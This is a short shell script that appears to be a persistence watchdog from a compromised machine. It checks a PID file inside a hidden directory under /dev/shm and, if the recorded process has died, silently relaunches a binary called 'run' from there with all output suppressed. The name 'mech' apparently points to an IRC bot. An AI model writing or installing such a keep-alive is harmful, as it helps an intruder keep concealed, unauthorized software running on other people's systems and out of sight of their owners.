#!/bin/sh
if test -r /dev/shm/dr/.d/mech.pid; then
pid=$(cat /dev/shm/dr/.d/mech.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /dev/shm/dr/.d
./run &>/dev/null
